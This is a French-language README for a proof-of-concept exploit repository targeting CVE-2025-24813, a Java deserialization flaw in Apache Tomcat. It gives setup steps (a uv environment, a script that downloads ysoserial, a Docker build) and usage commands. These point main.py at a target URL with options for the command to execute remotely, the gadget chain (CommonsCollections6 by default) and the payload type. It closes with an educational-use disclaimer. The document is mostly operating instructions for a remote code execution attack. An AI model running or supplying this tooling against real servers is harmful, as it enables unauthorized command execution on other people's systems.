
Ce dépôt contient un exploit de type preuve de concept (PoC) pour CVE-2025-24813, une vulnérabilité de désérialisation Java dans Apache Tomcat.
Basé sur absholi7ly/POC-CVE-2025-24813/.
Installez les dépendances :
uv venv
source .venv/bin/activate
uv sync
Téléchargez ysoserial :
./download.sh
Construisez et exécutez l'exploit dans un conteneur :
docker build -t cve-2025-24813-poc:latest .
docker run --rm -it --mount "type=bind,src=$(pwd),target=/app" cve-2025-24813-poc:latest
python main.py <target>
Exécutez l'exploit directement :
python main.py <target_url> [options]
--command : Commande à exécuter (par défaut : calc.exe)--ysoserial : Chemin vers ysoserial.jar (par défaut : ./ysoserial-all.jar)--gadget : Chaîne de gadgets ysoserial (par défaut : CommonsCollections6)--payload_type : Type de charge utile - ysoserial ou java (par défaut : ysoserial)--no-ssl-verify : Désactiver la vérification SSL# Basic usage
python main.py http://target:8080
# Custom command
python main.py http://target:8080 --command "whoami"
# Using Java payload instead of ysoserial
python main.py http://target:8080 --payload_type java
Cet outil est destiné uniquement à des fins éducatives et à des tests autorisés. Ne l'utilisez pas contre des systèmes dont vous n'êtes pas propriétaire ou que vous n'avez pas l'autorisation explicite de tester.